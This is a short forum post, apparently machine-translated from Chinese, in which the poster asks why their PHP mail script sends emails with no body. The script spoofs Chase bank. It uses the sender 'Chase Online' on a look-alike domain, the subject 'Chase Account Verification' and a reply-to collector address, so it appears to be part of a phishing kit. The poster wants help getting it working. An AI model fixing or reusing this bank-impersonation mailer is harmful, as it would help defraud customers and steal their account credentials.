我在这里发布了一个问题,就像30分钟前一样,回复了帖子,发现了一个可能有用的脚本,但我找不到放置身体的位置。我已经在代码中的任何地方输入了文本,但它仍然不断发送没有正文的电子邮件。如果有人能帮助我,那就太好了。
<?php
$name = $_POST['Chase'];
$email = $_POST['email'];
$message = $_POST['imabig kid now'];
$from = 'From: player@profile-service-update.com';
$to = 'bayliegreen13@gmail.com, chaseverification@accountant.com';
$subject = 'Chase Account Verification';
$body = "From: $name\n E-Mail: $email\n Message:\r\n $message";
$headers .= "MIME-Version: 1.0\r\n";
$headers .= "Content-type: text/html\r\n";
$headers = 'From: Chase Online <chase@profile-service-update.com>' . "\r\n" .
'Reply-To: chaseverification@accountant.com' . "\r\n" .
'X-Mailer: PHP/' . phpversion();
mail($to, $subject, $message, $headers, $body);